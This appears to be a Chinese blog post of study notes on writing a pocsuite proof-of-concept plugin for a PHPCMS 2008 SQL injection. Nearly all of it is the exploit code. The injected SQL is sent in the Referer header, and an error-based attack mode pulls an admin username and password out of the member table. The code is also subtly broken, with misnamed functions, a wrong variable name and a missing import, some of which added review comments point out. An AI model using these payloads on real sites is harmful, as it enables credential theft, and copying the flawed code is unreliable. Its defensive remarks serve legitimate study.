在这里,首先向安全圈最大的娱乐公司,某404致敬。
参考博文 https://www.seebug.org/help/dev 向seebug平台及该文原作者致敬,虽然并不知道是谁
其实长话短说,可发挥的部分并不多,就以原博文中的SQL注入例子(web应用漏洞)来记录自己的学习心得笔记。
感觉整篇POC能自己发挥的并不多,从代码上看,几乎90%的代码照要求填写即可,可发挥的部分,基本就是构造URL payload,发包匹配回显。嗯,就酱。
戴着镣铐起舞更美不是吗,哎,其他的照抄吧,可发挥的部分主要在于漏洞研究,不在于开发代码部分。抽时间还是要写一写的,想要个自己的站点balabala
#!/usr/bin/env python
# -*- coding:utf-8 -*- #import system lib files
import os#并没有用啊,我只是很喜欢这个库的名字,觉得很好看
import re
import sys#并没有用啊,我还是很喜欢这个库的名字,觉得很好看
import json#并没有用啊,我还是很喜欢这个库的名字,觉得很好看
import urlparse #import pocsuite lib file下面是要用到的pocsuite框架的一些函数或者类
from pocsuite.net import reg
from pocsuite.poc import POCBase
from pocsuite.utils import register


class mytest_poc(POCBase):
    """pocsuite plugin for the PHPCMS 2008 ``/data/js.php`` SQL injection (ssvid-62274).

    The class attributes are the metadata pocsuite expects from a PoC; the
    three methods are the framework's verify / attack entry points plus a
    small shared result formatter.

    From a defender's point of view the two things worth noticing are the
    transport and the oracle: the injected SQL is carried in the HTTP
    ``Referer`` header rather than the query string (so URL-only filtering
    or logging misses it), and the data is read back out of a MySQL
    "Duplicate entry" error that the application echoes into the page body.
    Not reflecting database error text to clients, and binding the ``id``
    parameter instead of interpolating it, removes both halves of that.

    NOTE(review): as printed this is a learning write-up rather than a
    finished tool -- several names it uses are not consistent with the
    imports shown above it, so do not expect it to run unmodified.
    """
    vulID = '' # vulnerability id (ssvid); left empty in this write-up
    version = 1 #poc version
    author = ["no.1 author","no.2 author",...] #author name list (template placeholder kept as-is)
    vulDate = '2011-11-21' #vul discory(report) date
    createDate = '2015-09-23' #poc create date
    updateDate = '2015-09-23' #poc update date
    referercens = ["http://www.seebug.org/vuldb/ssvid-62274"] # references; NOTE(review): presumably meant `references`, the framework's field name
    name = '_62274_phpcms_2008_place_sql_inj_PoC' #poc script name
    appPowerLink = 'http://www.phpcms.cn' #app vendor link
    appName = 'PHPCMS'
    appVersion = ''
    vulType = 'SQL Injection' # vulnerability type
    desc = """balabala""" # description (placeholder)
    samples = ['http://10.1.200.28/'] # example target used while writing the PoC

    def _attack(self):
        """Attack mode: try to read one row of ``phpcms_member`` via the error oracle.

        Same request shape as ``_verify`` (GET with the payload in the
        ``Referer`` header); only the embedded subquery differs.  The
        username and password are delimited with ``--`` / ``---`` inside the
        duplicate-key error text and picked out by the regex below.

        Returns whatever ``parse_attack`` builds from ``result``.
        """
        result = {}
        vulurl = urlparse.urljson(self.url, '/data/js.php?id=1')
        # Error-based extraction: the floor(rand(0)*2)/group-by trick makes
        # MySQL raise a duplicate-key error whose message contains the
        # selected value; the application then echoes that message.
        payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
        # Injection point is the Referer header -- a detection rule that only
        # inspects the URL / query string will not see this request as hostile.
        head = {
        'Referer': payload
        }
        resp = reg.get(vulurl,headers=head)
        if resp.status_code == 200:
            # The leaked row arrives inside a normal 200 page; the '1--...---...--'
            # framing matches the char(45) delimiters in the payload above.
            match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result.group(1)
                result['AdminInfo']['Password'] = match_result.group(2)
        return self.parse_attack(result)

    def _verify(self):
        """Verify mode: confirm the injection without touching application data.

        The payload asks the database to compute ``md5(1)``; if the known
        digest ``c4ca4238a0b923820dcc509a6f75849b`` (md5 of the string "1")
        shows up in the response body, the SQL was executed server-side and
        its error text was reflected back.

        Returns whatever ``parse_attack`` builds from ``result``.
        """
        result = {}
        vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
        payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
        # Same transport as _attack: payload travels in the Referer header.
        head = {
        'Referer': payload
        }
        resp = req.get(vulurl, headers=head)
        # Only a 200 whose body contains the md5 digest counts as vulnerable.
        if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in the framework's Output object.

        A non-empty ``result`` is reported as success; an empty one is
        reported as a failure with a fixed message.  ``Output`` is
        presumably pocsuite's result wrapper; it is not among the imports
        shown above.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


# Make the PoC discoverable by the pocsuite runner.
register(mytest_poc)